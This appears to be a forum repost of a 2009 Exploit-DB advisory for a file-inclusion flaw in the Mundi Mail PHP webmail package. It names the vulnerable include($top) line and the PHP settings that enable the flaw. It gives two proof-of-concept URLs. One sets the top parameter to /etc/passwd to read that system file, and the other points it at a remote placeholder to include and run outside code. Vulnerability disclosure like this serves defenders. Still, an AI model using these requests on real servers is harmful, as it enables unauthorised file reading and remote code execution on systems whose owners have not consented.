- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 8948
- Проверка EDB
-
- Пройдено
- Автор
- BR0LY
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2009-2095
- Дата публикации
- 2009-06-15
Код:
----------------------------------------------------------------------------------------------------------
Name : Mundi Mail
Site : http://sourceforge.net/projects/mundimail/
Down : http://sourceforge.net/project/showfiles.php?group_id=100875&package_id=108474&release_id=221732
----------------------------------------------------------------------------------------------------------
Found By : br0ly
Made in : Brasil
Contact : br0ly[dot]Code[at]gmail[dot]com
----------------------------------------------------------------------------------------------------------
Description:
Bug : Local/Remote File Inclusion
template/simpledefault/admin/_masterlayout.php:10: include($top);
If allow_url_fopen=on --> RFI;
If magic_quotes_gpc=off --> LFI;
----------------------------------------------------------------------------------------------------------
P0c:
LFI:http://localhost/Scripts/mundimail/template/simpledefault/admin/_masterlayout.php?top=/etc/passwd
RFI:http://localhost/Scripts/mundimail/template/simpledefault/admin/_masterlayout.php?top=[EVIL_CODE]
OBS: need register_globals=on;
----------------------------------------------------------------------------------------------------------
# milw0rm.com [2009-06-15]- Источник
- www.exploit-db.com
